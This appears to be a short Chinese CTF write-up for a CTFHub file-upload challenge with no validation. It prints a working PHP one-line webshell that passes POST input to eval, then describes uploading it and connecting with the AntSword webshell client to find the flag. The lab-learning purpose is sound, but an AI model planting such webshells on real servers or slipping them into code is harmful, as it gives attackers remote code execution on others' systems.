CTFHub技能书解题笔记-文件上传-无验证

文件上传-无验证"/>

CTFHub技能书解题笔记-文件上传-无验证

打开题目

说是无验证。咋也不懂，直接打开看看。

试试直接上传一句话木马。

<?php
 echo "hello";
@eval($_POST['shell']);?>

直接成功，这里访问试试。

成了。然后直接蚁剑连接

进行连接。这里的url就是刚才咱们访问shell.php文件的url。连接密码就是中括号里的shell。这里可以随意更改。

然后打开蚁剑，空白处右键添加数据。

 输入url和连接密码。点击测试连接。提示成功，就OK了。

 点击添加，然后再初始界面，双击我们刚才添加的连接。

 接下来就是寻宝了。点了个上层就到了。

        这道题就这么结束了。这个就很基础了，主要考的应该是咱们对如何简单进行webshell上传到反弹的整个过程的了解。

这里用到的shell连接工具，可以选择

蚁剑、菜刀、冰蝎等。我比较喜欢蚁剑。

工具的压缩包博主也都有收集。可私信提供，下载的时候忘了保存链接，所以没法给大家贴上传送门。